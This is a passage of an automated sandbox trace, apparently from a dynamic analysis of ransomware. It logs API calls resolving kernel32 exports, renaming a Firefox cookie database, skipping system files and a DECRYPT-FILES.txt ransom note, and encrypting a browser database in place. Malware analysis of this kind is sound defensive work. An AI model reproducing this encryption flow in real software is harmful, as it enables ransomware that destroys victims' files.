(lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.959] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.959] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.959] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.959] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.959] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.959] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.959] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.959] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.959] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.959] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.959] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.959] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.959] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.960] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.960] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.960] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.960] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.960] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.960] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.960] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.960] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.960] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.960] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.960] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 102 [0080.960] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.VAtSvR") returned 109 [0080.960] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.VAtSvR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.vatsvr"), dwFlags=0x0) returned 1 [0080.961] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.961] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.961] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.962] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3bc9a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.962] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.962] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc374ed0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbc374ed0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbc555e20, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="downloads.sqlite", cAlternateFileName="DOWNLO~1.SQL")) returned 1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="DECRYPT-FILES.txt") returned 1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="autorun.inf") returned 1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="boot.ini") returned 1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="desktop.ini") returned 1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="ntuser.dat") returned -1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="iconcache.db") returned -1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="bootsect.bak") returned 1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="ntuser.dat.log") returned -1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="thumbs.db") returned -1 [0080.962] lstrcmpiW (lpString1="downloads.sqlite", lpString2="Bootfont.bin") returned 1 [0080.962] lstrlenW (lpString="downloads.sqlite") returned 16 [0080.962] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0080.962] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0080.962] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0080.962] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0080.962] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.962] lstrlenW (lpString="downloads.sqlite") returned 16 [0080.962] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0080.962] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="downloads.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" [0080.962] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.963] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.963] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=98304) returned 1 [0080.963] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.963] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0080.968] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.968] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.968] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.971] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.971] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0081.010] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.010] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0081.011] CloseHandle (hObject=0x464) returned 1 [0081.011] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.011] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.012] CloseHandle (hObject=0x0) returned 0 [0081.012] CloseHandle (hObject=0x460) returned 1 [0081.012] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.012] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.013] GetTickCount () returned 0x114cbc8 [0081.013] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.013] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.013] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.013] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.013] lstrlenA (lpString="kernel32.dll") returned 12 [0081.014] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.014] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.014] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.014] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.014] lstrlenA (lpString="ADDATOMA") returned 8 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.014] lstrlenA (lpString="ADDATOMW") returned 8 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.014] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.014] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.014] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.014] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.014] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.014] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.014] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.014] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.014] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.014] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.014] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.014] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.015] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.015] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.015] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.015] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.015] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.015] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.015] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.015] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.015] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.015] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.015] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.015] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.015] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.015] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.015] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.015] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.015] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.015] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.015] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.016] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.016] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.016] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.016] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.016] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.016] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.016] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.016] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.016] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.016] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.016] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.016] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.016] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.016] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.016] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.016] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.016] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.016] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.016] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.017] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.017] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.017] lstrlenA (lpString="BEEP") returned 4 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.017] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.017] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.017] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.017] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.017] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.017] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.017] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.017] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.017] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.017] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 